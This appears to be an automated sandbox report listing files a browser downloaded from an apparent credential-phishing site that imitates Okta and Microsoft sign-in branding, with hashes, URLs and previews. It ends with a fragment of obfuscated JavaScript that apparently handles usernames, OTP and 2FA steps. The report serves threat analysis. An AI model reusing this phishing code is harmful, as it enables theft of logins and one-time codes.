                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):727
                                                Entropy (8bit):7.573165690842521
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/qrEaS7AAzbHTAIpoEg9ULQ0D4WTpQClmnbE4Ig3vQttYRYkiwx6baN45140
                                                Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):10796
                                                Entropy (8bit):7.946024875001343
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:12BDACC832185D0367ECC23FD24C86CE
                                                SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):1660
                                                Entropy (8bit):4.301517070642596
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (2287)
                                                Category:downloaded
                                                Size (bytes):171481
                                                Entropy (8bit):5.557050786250954
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:336E2189AF4A0E5A424F8F426970FE97
                                                SHA1:7A7C574421184E15B88491EEA7E08193BDA9F6CD
                                                SHA-256:552217606D2A17D66D7593D548E5EF3D4462771441A35D3193BF6856C51B0DBE
                                                SHA-512:5C3518ACD447A78BC9EF930291774B33A8C4831283D9F51D401CAA2CEC5B50EFF6CA1742DE011CB3CF917ACEAA48FB879BAC23EF02AC868450E23B6C0B47DDA9
                                                Malicious:false
                                                Reputation:unknown
                                                URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.49NkKSaGO4A.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTsOtz3uaG9n3AfW6H9hKaPFbkrwpQ"
                                                Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.hj=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var ij,lj,uj,jj;ij=function(){_.Ka()};lj=function(a,b){(jj||(jj=new WeakMap)).set(a,b);(_.kj||(_.kj=new WeakMap)).set(b,a)};_.mj=function(a,b,c,d){a=_.ub(a,b,c,d);return Array.isArray(a)?a:_.Gc};_.nj=function(a,b){a=(2&b?a|2:a&-3)|32;return a&=-2049};_.oj=function(a,b){a===0&&(a=_.nj(a,b));return a|1};_.pj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.qj=function(a,b,c){32&b&&c||(a&=-33);return a};._.tj=function(a,b,c,d,e,f,g){var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.mj(a,b,d);var k=h[_.v]|0,l=!!(4&k);if(!l){k=_.oj(k,b);var m=h,p=b;const q=!!(2&k);q&&(p|=2);let x=!q,A=!0,D=0,L=0;for(;D<m.length;D++){const K=_.Ta(m[D],c,p);if(K instanceof c){if(!q){const oa=_.za(K.ha);x&&(x=!oa);A&&(A=oa)}m[L++]=K}}L<D&&(m.length=L);k|=4;k=A?k|16:k&-17;k=x?k|8:k&-9;m[_.v]=k;q&&Object.freeze(m)}if(g&&!(8&k||!h.length&&(e===1||e===4&&32&k))){_.pj(k)&&(h=_.ya
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                Category:downloaded
                                                Size (bytes):43596
                                                Entropy (8bit):7.9952701440723475
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/89WHtyP36m5n12EwIexeab77
                                                Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 342 x 72, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):5139
                                                Entropy (8bit):7.865234009830226
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8B36337037CFF88C3DF203BB73D58E41
                                                SHA1:1ADA36FA207B8B96B2A5F55078BFE2A97ACEAD0E
                                                SHA-256:E4E1E65871749D18AEA150643C07E0AAB2057DA057C6C57EC1C3C43580E1C898
                                                SHA-512:97D8CC97C4577631D8D58C0D9276EE55E4B80128080220F77E01E45385C20FE55D208122A8DFA5DADCB87543B1BC291B98DBBA44E8A2BA90D17C638C15D48793
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/delL7KipMN4YrDuaWlFkKCVXRhlS6hFiaK7jW3cRHECv1imf4MPO4ymuTMM479llOypkdw8wVin7PAwMeCC45MXxazmpwk1XeEvn3QcUFc3YMCajnamo2BJi3MqQUPxWHuDuahLA7TvLMYQa6rpog344op670
                                                Preview:.PNG........IHDR...V...H.............tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:DB120779422011EA9888910153D3A5E6" xmpMM:DocumentID="xmp.did:DB12077A422011EA9888910153D3A5E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DB120777422011EA9888910153D3A5E6" stRef:documentID="xmp.did:DB120778422011EA9888910153D3A5E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>P.WI....IDATx..]]l.......(.5.K0P..0...E.qT..J X)F.(5X....J.}(m.R5.Q...RUEUPU~.....qp@.b......L...k.m"0......"c.3
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (45667)
                                                Category:downloaded
                                                Size (bytes):45806
                                                Entropy (8bit):5.207605835316031
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                                Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                Category:downloaded
                                                Size (bytes):28000
                                                Entropy (8bit):7.99335735457429
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/pqB2rUevlP2WXO12xDsuv40
                                                Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (1434), with no line terminators
                                                Category:downloaded
                                                Size (bytes):1434
                                                Entropy (8bit):5.753879254497127
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8C42AEB65A5E249CDAC026525C9262CA
                                                SHA1:6224FC6FC3CF389B257B8F2405A466FD60EBB5E7
                                                SHA-256:7CB7B3E07675CD1ED331968CDC8E63CADE8B8CFF7BB3A60A7B8D74129E8DBFDA
                                                SHA-512:1A4D62A054B3353F0A72756D3079F0EE9E3E57B47FC669851966CCDFDC9A269BA6909A1A4E68B7C75822E3534C5EEA41C546E1C59C721B8876A87EDD5180641A
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.google.com/recaptcha/api.js
                                                Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                Category:downloaded
                                                Size (bytes):35970
                                                Entropy (8bit):7.989503040923577
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/yzNLQi7ifuW56TdPmEfqr50
                                                Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):270
                                                Entropy (8bit):4.840496990713235
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:40EB39126300B56BF66C20EE75B54093
                                                SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/mnemL1fKdLhVQmQN1EjAdzUFAtQUQlHWwP8Puvm0lYX1H1ko3UuAIAl7CZ6YR90149
                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 161 x 60, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):9111
                                                Entropy (8bit):7.904283520894645
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:AACD849B38708FD4A7A151500AD9EF18
                                                SHA1:E7E06E76F3512FD3800FA0C1CB4583934935B674
                                                SHA-256:A6E5994F354CC2A7FC522B39D2A6F43C8E18A1BF9101E801EF73172E115D99B7
                                                SHA-512:0A0422A6F2DCD819B0E3C62F950AFC7BEF6654F6B33AA0F8CC7E8779A556265D5B76944CE8047F14EB6EFA3BA7ECDD192693EEA6ECD78577A337EC66FA81AA69
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://aadcdn.msauthimages.net/dbd5a2dd-pe9dfvunzx2wd4iar3dpjvfqrulsu3pvc63dy7q29ee/logintenantbranding/0/bannerlogo?ts=637788973401667927
                                                Preview:.PNG........IHDR.......<........+...xiCCPDisplay..H..WwT...._IBB.M....."M..P...`.I.@..#A..8..c.Q.......*..u.u,.u....:*V........g..w...O......EJ..4...*&9:\...-.<...z0..H\..KJ......#...@..ew.R)..g..i.. ..............`..`7Y.T..Y.L..l....i.....4G..0eR.......'.1y..m..Rq..0...C!.)..`...|.......**...j...<%.o....f.....Dy}../..N..D).M./G..[.\....^>..... n...%....NENB".c..I4s.H^.:&M.'-.%.l.f..!.E.....(.<!^....b...d.L...`.@..D.h9...dm..1...i."....L.....j.)......<../..'.0..!%.)qZ..|aB/.Q'.....d.":\.O..2Q.Z~EQIo...|Yl....O...:&.E.hz..H.ai.:....^$.HM..c."-E..T.'kbi.R....Ryt2.[...)M....*&U...\.*)US']^ .....^.x...... ..(..\gS'..(.. .R.k.....@..RP.....%}q......P.c...vG.D`P.)JP..`P.8.!....P.eK..` ...". F1.(.........0...E....^&;....aG.]h.:.....`:...=i?....|.C.E.}.UV;......*G..j.....r..#.I...t..L.C@...p..i?:....i...Bm.j0_....x.Z..Kr.sC.._G......H....hj.......././A1.fR.....u.j.. ..S....A....0....).(.....'..d E.G......;..L...b..F.....).r. V!.2X.....dfe.4?_/.@. .N.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):19
                                                Entropy (8bit):3.6818808028034042
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9FAE2B6737B98261777262B14B586F28
                                                SHA1:79C894898B2CED39335EB0003C18B27AA8C6DDCD
                                                SHA-256:F55F6B26E77DF6647E544AE5B45892DCEA380B7A6D2BFAA1E023EA112CE81E73
                                                SHA-512:29CB8E5462B15488B0C6D5FC1673E273FB47841E9C76A4AA5415CA93CEA31B87052BBA511680F2BC9E6543A29F1BBFBA9D06FCC08F5C65BEB115EE7A9E5EFF36
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.google.com/async/ddljson?async=ntp:2
                                                Preview:)]}'.{"ddljson":{}}
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:dropped
                                                Size (bytes):268
                                                Entropy (8bit):5.111190711619041
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:59759B80E24A89C8CD029B14700E646D
                                                SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                Category:downloaded
                                                Size (bytes):120390
                                                Entropy (8bit):5.190875566468324
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:FF20110ACBB247BA1E31E0AE410B6EC8
                                                SHA1:382B6D509A92EEA89A7162F67BEEC2DDC3365952
                                                SHA-256:BA7433867699A191306DC3D4A7177A1B37BB315963770004F9996E5918ED90C1
                                                SHA-512:63C1135713A131BF6B93E07E3FB956D216A813943E8A889C7A2D646FA8526A83B7E02512E13DCCC16DBBE15A9BE8B18085D382E6ECA5D52AAC7A8B71855F8C2F
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/561kTQfwmFrmVsnLijnecw968D3rUnaR6a67108
                                                Preview:const _0x6a4795=_0x521e;(function(_0x33cd6e,_0x44b3f1){const _0x175f50=_0x521e,_0x3e19d6=_0x33cd6e();while(!![]){try{const _0x183a15=parseInt(_0x175f50(0x75))/0x1+parseInt(_0x175f50(0xcd))/0x2+parseInt(_0x175f50(0x233))/0x3*(-parseInt(_0x175f50(0x1f5))/0x4)+parseInt(_0x175f50(0x134))/0x5+-parseInt(_0x175f50(0x135))/0x6+parseInt(_0x175f50(0x12a))/0x7*(parseInt(_0x175f50(0x18f))/0x8)+-parseInt(_0x175f50(0x1ca))/0x9;if(_0x183a15===_0x44b3f1)break;else _0x3e19d6['push'](_0x3e19d6['shift']());}catch(_0x397690){_0x3e19d6['push'](_0x3e19d6['shift']());}}}(_0x419e,0xd216d));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;let wait2facancel=0x0,otptype=0x0;var currentweb=0x0,pagevisitedalready=null;let viewtype=null;function _0x419e(){const _0x3da865=['waiting\x20for\x20previous\x20request\x20to\x20complete','phone\x20otp','112504WRrgbA','section_multipleaccounts','linkoptionclick(this)','protectoptions','img','text-left','body','error_uname_pdf','a_id','valid\x20otp',
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
